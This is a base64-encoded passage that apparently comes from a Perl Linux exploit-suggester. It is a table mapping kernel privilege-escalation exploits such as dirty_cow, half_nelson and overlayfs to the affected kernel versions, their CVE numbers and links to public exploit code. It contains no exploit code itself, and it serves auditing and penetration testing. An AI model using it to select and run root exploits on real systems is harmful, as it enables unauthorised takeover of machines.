IuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAwOC00MjEwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNjg1MScsCiAgICB9LAogICAgJ2V4aXRfbm90aWZ5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy84MzY5JywKICAgIH0sCiAgICAndWRldicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScgXSwKICAgICAgICBhbHQgID0+ICd1ZGV2IDwxLjQuMScsCiAgICAgICAgY3ZlICA9PiAnMjAwOS0xMTg1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvODQ3OCcsCiAgICB9LAoKICAgICdzb2NrX3NlbmRwYWdlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjAnLCAgJzIuNi4xJywKICAgICAgICAgICAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywgICcyLjYuNicsICAnMi42LjcnLAogICAgICAgICAgICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsICcyLjYuMTMnLAogICAgICAgICAgICAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywgJzIuNi4xOCcsICcyLjYuMTknLAogICAgICAgICAgICAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLAogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ3Byb3RvX29wcycsCiAgICAgICAgY3ZlID0+ICcyMDA5LTI2OTInLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy85NDM2JywKICAgIH0sCgogICAgJ3NvY2tfc2VuZHBhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNC40JywgICcyLjQuNScsICAnMi40LjYnLCAgJzIuNC43JywgICcyLjQuOCcsICAnMi40LjknLAogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xMScsICcyLjQuMTInLCAnMi40LjEzJywgJzIuNC4xNCcsICcyLjQuMTUnLAogICAgICAgICAgICAnMi40LjE2JywgJzIuNC4xNycsICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLAogICAgICAgICAgICAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnLCAnMi40LjI1JywgJzIuNC4yNicsICcyLjQuMjcnLAogICAgICAgICAgICAnMi40LjI4JywgJzIuNC4yOScsICcyLjQuMzAnLCAnMi40LjMxJywgJzIuNC4zMicsICcyLjQuMzMnLAogICAgICAgICAgICAnMi40LjM0JywgJzIuNC4zNScsICcyLjQuMzYnLCAnMi40LjM3JywgJzIuNi4wJywgICcyLjYuMScsCiAgICAgICAgICAgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsICAnMi42LjYnLCAgJzIuNi43JywKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywKICAgICAgICAgICAgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywKICAgICAgICAgICAgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI1JywKICAgICAgICAgICAgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICd3dW5kZXJiYXJfZW1wb3JpdW0nLAogICAgICAgIGN2ZSA9PiAnMjAwOS0yNjkyJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvOTQzNScsCiAgICB9LAogICAgJ3VkcF9zZW5kbXNnXzMyYml0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLCAgJzIuNi42JywKICAgICAgICAgICAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLCAnMi42LjEyJywKICAgICAgICAgICAgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLCAnMi42LjE4JywKICAgICAgICAgICAgJzIuNi4xOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMjY5OCcsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL2Rvd25sb2Fkcy5zZWN1cml0eWZvY3VzLmNvbS92dWxuZXJhYmlsaXRpZXMvZXhwbG9pdHMvMzYxMDguYycsCiAgICB9LAogICAgJ3BpcGUuY18zMmJpdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjE1JywgJzIuNi4xNicsCiAgICAgICAgICAgICcyLjYuMTcnLCAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsCiAgICAgICAgICAgICcyLjYuMjMnLCAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMzU0NycsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9kYXRhL3Z1bG5lcmFiaWxpdGllcy9leHBsb2l0cy8zNjkwMS0xLmMnLAogICAgfSwKICAgICdkb19wYWdlc19tb3ZlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnc2lldmUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0wNDE1JywKICAgICAgICBtaWwgPT4gJ1NwZW5kZXJzIEVubGlnaHRlbm1lbnQnLAogICAgfSwKICAgICdyZWlzZXJmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMTE0NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEyMTMwJywKICAgIH0sCiAgICAnY2FuX2JjbScgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC0yOTU5JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTQ4MTQnLAogICAgfSwKICAgICdyZHMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgICAgICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTUyODUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zOTA0JywKICAgIH0sCiAgICAnaGFsZl9uZWxzb24xJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywKICAgICAgICAgICAgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ2Vjb25ldCcsCiAgICAgICAgY3ZlID0+ICcyMDEwLTM4NDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNzc4NycsCiAgICB9LAogICAgJ2hhbGZfbmVsc29uMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdlY29uZXQnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zODUwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTc3ODcnLAogICAgfSwKICAgICdoYWxmX25lbHNvbjMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnZWNvbmV0JywKICAgICAgICBjdmUgPT4gJzIwMTAtNDA3MycsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE3Nzg3JywKICAgIH0sCiAgICAnY2Fwc190b19yb290JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicgXSwKICAgICAgICBjdmUgID0+ICduL2EnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTkxNicsCiAgICB9LAogICAgJ2FtZXJpY2FuLXNpZ24tbGFuZ3VhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC00MzQ3JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYmlkLzQ1NDA4JywKICAgIH0sCiAgICAncGt0Y2R2ZCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEwLTM0MzcnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTE1MCcsCiAgICB9LAogICAgJ3ZpZGVvNGxpbnV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMzA4MScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE1MDI0JywKICAgIH0sCiAgICAnbWVtb2RpcHBlcicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjM5JywgJzMuMC4wJywgJzMuMC4xJywgJzMuMC4yJywgJzMuMC4zJywgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTItMDA1NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE4NDExJywKICAgIH0sCiAgICAnc2VtdGV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMzcnLCAnMi42LjM4JywgJzIuNi4zOScsICczLjAuMCcsICczLjAuMScsICczLjAuMicsCiAgICAgICAgICAgICczLjAuMycsICAnMy4wLjQnLCAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI1NDQ0JywKICAgIH0sCiAgICAncGVyZl9zd2V2ZW50JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICczLjAuMCcsICczLjAuMScsICczLjAuMicsICczLjAuMycsICczLjAuNCcsICczLjAuNScsCiAgICAgICAgICAgICczLjAuNicsICczLjEuMCcsICczLjIuMCcsICczLjMuMCcsICczLjQuMCcsICczLjQuMScsCiAgICAgICAgICAgICczLjQuMicsICczLjQuMycsICczLjQuNCcsICczLjQuNScsICczLjQuNicsICczLjQuOCcsCiAgICAgICAgICAgICczLjQuOScsICczLjUuMCcsICczLjYuMCcsICczLjcuMCcsICczLjguMCcsICczLjguMScsCiAgICAgICAgICAgICczLjguMicsICczLjguMycsICczLjguNCcsICczLjguNScsICczLjguNicsICczLjguNycsCiAgICAgICAgICAgICczLjguOCcsICczLjguOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI2MTMxJywKICAgIH0sCiAgICAnbXNyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgICAgICcyLjYuMzUnLCAnMi42LjM2JywgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMC4wJywKICAgICAgICAgICAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgICczLjAuNScsICAnMy4wLjYnLAogICAgICAgICAgICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLCAgJzMuNS4wJywgICczLjYuMCcsCiAgICAgICAgICAgICczLjcuMCcsICAnMy43LjYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEzLTAyNjgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yNzI5NycsCiAgICB9LAogICAgJ3RpbWVvdXRwd24nID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuNC4wJywgICczLjUuMCcsICAnMy42LjAnLCAgJzMuNy4wJywgICczLjguMCcsICAnMy44LjknLCAKICAgICAgICAgICAgJzMuOS4wJywgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC41JywgICczLjguNicsICAKICAgICAgICAgICAgJzMuOC45JywgICczLjkuMCcsICAnMy45LjYnLCAgJzMuMTAuMCcsICczLjEwLjYnLCAnMy4xMS4wJywKICAgICAgICAgICAgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xMy4xJwogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDE0LTAwMzgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8zMTM0NicsCiAgICB9LAogICAgJ3Jhd21vZGVQVFknID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLCAnMi42LjM2JywKICAgICAgICAgICAgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMTQuMCcsICczLjE1LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTQtMDE5NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vcGFja2V0c3Rvcm1zZWN1cml0eS5jb20vZmlsZXMvZG93bmxvYWQvMTI2NjAzL2N2ZS0yMDE0LTAxOTYtbWQuYycsCiAgICB9LAogICAgJ292ZXJsYXlmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMy4xMy4wJywgJzMuMTYuMCcsICczLjE5LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTUtODY2MCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5MjMwJywKICAgIH0sCiAgICAncHBfa2V5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCgkJCSczLjQuMCcsICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC4xJywgIAogICAgICAgICAgICAnMy44LjInLCAgJzMuOC4zJywgICczLjguNCcsICAnMy44LjUnLCAgJzMuOC42JywgICczLjguNycsICAKICAgICAgICAgICAgJzMuOC44JywgICczLjguOScsICAnMy45LjAnLCAgJzMuOS42JywgICczLjEwLjAnLCAnMy4xMC42JywgCiAgICAgICAgICAgICczLjExLjAnLCAnMy4xMi4wJywgJzMuMTMuMCcsICczLjEzLjEnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtMDcyOCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5Mjc3JywKICAgIH0sCiAgICAnZGlydHlfY293JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsIAoJCQknMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAKICAgICAgICAgICAgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsICcyLjYuMzcnLCAnMi42LjM4JywgCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgIAogICAgICAgICAgICAnMy4wLjUnLCAgJzMuMC42JywgICczLjEuMCcsICAnMy4yLjAnLCAgJzMuMy4wJywgICczLjQuMCcsICAKICAgICAgICAgICAgJzMuNS4wJywgICczLjYuMCcsICAnMy43LjAnLCAgJzMuNy42JywgICczLjguMCcsICAnMy45LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtNTE5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQwNjE2JywKICAgIH0sCiAgICAnYWZfcGFja2V0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzQuNC4wJyBdLAogICAgICAgIGN2ZSA9PiAnMjAxNi04NjU1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDA4NzEnLAogICAgfSwKICAgICdwYWNrZXRfc2V0X3JpbmcnID0+IHsKICAgICAgICB2dWxuID0+IFsnNC44LjAnIF0sCiAgICAgICAgY3ZlID0+ICcyMDE3LTczMDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80MTk5NCcsCiAgICB9LAogICAgJ2Nsb25lX25ld3VzZXInID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuMy41JywgJzMuMy40JywgJzMuMy4yJywgJzMuMi4xMycsICczLjIuOScsICczLjIu